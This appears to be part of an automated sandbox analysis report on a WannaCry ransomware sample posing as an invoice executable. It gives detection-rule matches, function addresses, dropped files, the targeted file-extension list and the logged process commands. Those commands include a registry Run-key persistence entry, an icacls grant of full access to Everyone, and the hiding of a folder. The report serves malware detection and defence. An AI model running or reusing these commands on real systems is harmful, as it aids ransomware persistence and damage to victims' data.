            Source: 59.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
            Source: 10.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.a48ba8.0.raw.unpack, type: UNPACKEDPE, Matched rule: WanaCry Payload, Author: kevoreilly
            Source: 10.0.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
            Source: 10.0.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
            Source: 10.0.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
            Source: 0000000A.00000002.3004531388.000000000040F000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY, Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
            Source: 0000000A.00000000.2272165012.000000000040E000.00000008.00000001.01000000.00000006.sdmp, type: MEMORY, Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
            Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPED, Matched rule: Detects WannaCry Ransomware Note, Author: Florian Roth
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, type: DROPPED, Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
            Source: C:\Users\user\Desktop\r.wnry, type: DROPPED, Matched rule: Detects WannaCry Ransomware Note, Author: Florian Roth
            Source: C:\Users\user\Desktop\118491705402797.bat, type: DROPPED, Matched rule: Detects WannaCry Ransomware BATCH File, Author: Florian Roth
            Source: C:\Users\user\Desktop\u.wnry, type: DROPPED, Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, type: DROPPED, Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, type: DROPPED, Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, type: DROPPED, Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCA3C086_2_6CDCA3C0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDBC3F086_2_6CDBC3F0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC000086_2_6CDC0000
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDDB26086_2_6CDDB260
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC431086_2_6CDC4310
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD032086_2_6CDD0320
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CED6BA086_2_6CED6BA0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE4CCD086_2_6CE4CCD0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE62CD086_2_6CE62CD0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEF6CB086_2_6CEF6CB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEC2C9086_2_6CEC2C90
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE80C0086_2_6CE80C00
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE44DB086_2_6CE44DB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF2CD6086_2_6CF2CD60
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEE8D7086_2_6CEE8D70
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE5AD5D86_2_6CE5AD5D
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE30A3086_2_6CE30A30
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CECCD1086_2_6CECCD10
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF58EF086_2_6CF58EF0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE2CEF986_2_6CE2CEF9
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE30EC086_2_6CE30EC0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE54EA086_2_6CE54EA0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE50EA986_2_6CE50EA9
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE22EB086_2_6CE22EB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE4CE8086_2_6CE4CE80
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE60E6086_2_6CE60E60
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEBEE6086_2_6CEBEE60
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE44E4086_2_6CE44E40
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE66E2086_2_6CE66E20
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE74E0086_2_6CE74E00
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF44E0086_2_6CF44E00
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE32FFC86_2_6CE32FFC
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE5EFC086_2_6CE5EFC0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF42FB086_2_6CF42FB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE4AFB086_2_6CE4AFB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE58F8086_2_6CE58F80
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF74F8086_2_6CF74F80
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEA4F9086_2_6CEA4F90
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE22EB086_2_6CE22EB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEB28F086_2_6CEB28F0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE2C8B086_2_6CE2C8B0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEAA88086_2_6CEAA880
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF7888086_2_6CF78880
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF3E86086_2_6CF3E860
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE5084686_2_6CE50846
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF0684086_2_6CF06840
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE6885086_2_6CE68850
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEEA85086_2_6CEEA850
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE5480086_2_6CE54800
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE6680086_2_6CE66800
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF489F086_2_6CF489F0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF369C086_2_6CF369C0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE5A9D086_2_6CE5A9D0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE549D086_2_6CE549D0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF6299086_2_6CF62990
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE8298086_2_6CE82980
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF4298086_2_6CF42980
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE4694086_2_6CE46940
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE4892086_2_6CE48920
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE6292086_2_6CE62920
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE7E90086_2_6CE7E900
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE32A8086_2_6CE32A80
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE4AA8086_2_6CE4AA80
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE56A6086_2_6CE56A60
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE5CA4086_2_6CE5CA40
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE3216086_2_6CE32160
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE30A3086_2_6CE30A30
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEFEA0086_2_6CEFEA00
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEA4BE086_2_6CEA4BE0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE7EB6086_2_6CE7EB60
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEF44F086_2_6CEF44F0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEBC4B086_2_6CEBC4B0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE9248086_2_6CE92480
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CED444086_2_6CED4440
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE5442086_2_6CE54420
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF7241086_2_6CF72410
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF405F086_2_6CF405F0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE5A5A086_2_6CE5A5A0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE425B286_2_6CE425B2
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE3657986_2_6CE36579
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF3E55086_2_6CF3E550
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF7854086_2_6CF78540
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF7C52086_2_6CF7C520
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF2E6F086_2_6CF2E6F0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF466E086_2_6CF466E0
            Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe.8.drStatic PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract, compression method=deflate
            Source: taskdl.exe.10.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: libeay32.dll.59.drStatic PE information: Number of sections : 18 > 10
            Source: libssp-0.dll.59.drStatic PE information: Number of sections : 17 > 10
            Source: libevent-2-0-5.dll.59.drStatic PE information: Number of sections : 17 > 10
            Source: libevent_extra-2-0-5.dll.59.drStatic PE information: Number of sections : 17 > 10
            Source: ssleay32.dll.59.drStatic PE information: Number of sections : 18 > 10
            Source: libgcc_s_sjlj-1.dll.59.drStatic PE information: Number of sections : 17 > 10
            Source: libevent_core-2-0-5.dll.59.drStatic PE information: Number of sections : 17 > 10
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: dhcpcsvc.dll
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ubykpkpwzybxbgo789" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
            Source: 10.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.a48ba8.0.unpack, type: UNPACKEDPEMatched rule: WanaCry author = kevoreilly, description = WanaCry Payload, cape_type = WanaCry Payload
            Source: 10.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.10000000.1.unpack, type: UNPACKEDPEMatched rule: WanaCry author = kevoreilly, description = WanaCry Payload, cape_type = WanaCry Payload
            Source: 59.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 10.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.a48ba8.0.raw.unpack, type: UNPACKEDPEMatched rule: WanaCry author = kevoreilly, description = WanaCry Payload, cape_type = WanaCry Payload
            Source: 10.0.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
            Source: 10.0.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: 10.0.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 0000000A.00000002.3004531388.000000000040F000.00000004.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: 0000000A.00000000.2272165012.000000000040E000.00000008.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: C:\Users\user\Desktop\r.wnry, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: C:\Users\user\Desktop\118491705402797.bat, type: DROPPEDMatched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: C:\Users\user\Desktop\u.wnry, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, type: DROPPEDMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, type: DROPPEDMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000003.2348355194.0000000000A86000.00000004.00000020.00020000.00000000.sdmp, Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000003.2298742785.0000000000A6C000.00000004.00000020.00020000.00000000.sdmp, Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000003.2289319382.0000000000A6F000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000003B.00000000.2402439775.000000000041F000.00000008.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe.10.drBinary or memory string: A.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docConnecting to server...s.wnry%08X.eky%08X.res00000000.resrb%08X.dky%08X.pkyConnectedSent requestSucceedReceived responseCongratulations! Your payment has been checked!
            Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp, Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000002.3006446411.0000000000A38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.edb.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.dotx.dotm.dot.docm.docb.jpg.jpeg.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.eml.msg.ost.pst.pptx.ppt.xlsx.xls.docx.doc%s\%d%s.WNCRYT%s%sTWANACRY!.WNCRY.WNCYR\\@WanaDecryptor@.bmp@WanaDecryptor@.exe.lnk@Please_Read_Me@.txt%s\%s...%s\*.dll.exe~SD@WanaDecryptor@.exeContent.IE5Temporary Internet Files This folder protects against ransomware. Modifying it will reduce protection\Local Settings\Temp\AppData\Local\Temp\Program Files (x86)\Program Files\WINDOWS\ProgramData\Intel$\CloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll
            Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000000.2272165012.000000000040E000.00000008.00000001.01000000.00000006.sdmpBinary or memory string: @.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docWANACRY!%s\%sCloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll
            Source: classification engineClassification label: mal100.rans.spyw.evad.winZIP@985/1012@0/6
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 10_2_10005190 GetDriveTypeW,GlobalAlloc,CreateFileW,GlobalFree,GetDriveTypeW,MoveFileExW,Sleep,GetDiskFreeSpaceExW,WriteFile,Sleep,Sleep,GlobalFree,FlushFileBuffers,CloseHandle,DeleteFileW,10_2_10005190
            Source: C:\Program Files\7-Zip\7zG.exeFile created: C:\Users\user\Desktop\Request for Quotation (RFQ_196).zipJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1916:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2524:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3220:120:WilError_03
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeMutant created: \Sessions\1\BaseNamedObjects\MsWinZonesCacheCounterMutexA
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4164:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2184:120:WilError_03
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeMutant created: \Sessions\1\BaseNamedObjects\Global\MsWinZonesCacheCounterMutexA0
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3268:120:WilError_03
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\All Users\Microsoft\Windows\WER\Temp\~SD4A37.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 118491705402797.bat
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbs
            Source: C:\Windows\SysWOW64\cscript.exeFile read: C:\Users\desktop.ini
            Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            Source: taskhsvc.exeString found in binary or memory: /home/ubuntu/install/mingw-w64/i686-w64-mingw32/include
            Source: taskhsvc.exeString found in binary or memory: /home/ubuntu/install/mingw-w64/i686-w64-mingw32/include/psdk_inc
            Source: taskhsvc.exeString found in binary or memory: /home/ubuntu/install/openssl/ssl/private
            Source: taskhsvc.exeString found in binary or memory: /home/ubuntu/install/openssl/ssl/certs
            Source: taskhsvc.exeString found in binary or memory: /home/ubuntu/install/openssl/ssl
            Source: taskhsvc.exeString found in binary or memory: /home/ubuntu/install/openssl/lib/engines
            Source: taskhsvc.exeString found in binary or memory: OPENSSLDIR: "/home/ubuntu/install/openssl/ssl"
            Source: taskhsvc.exeString found in binary or memory: ../../gcc-5.1.0/libgcc/soft-fp/addtf3.c
            Source: taskhsvc.exeString found in binary or memory: /home/ubuntu/install/mingw-w64/i686-w64-mingw32/include/sys
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            Source: unknown Process created: C:\Program Files\7-Zip\7zG.exe "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Desktop\" -an -ai#7zMap4588:126:7zEvent8780
            Source: unknown Process created: C:\Program Files\7-Zip\7zG.exe "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Desktop\" -an -ai#7zMap12385:118:7zEvent28652
            Source: unknown Process created: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe "C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe"
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe Process created: C:\Windows\SysWOW64\attrib.exe attrib +h .
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /Q
            Source: C:\Windows\SysWOW64\attrib.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\icacls.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
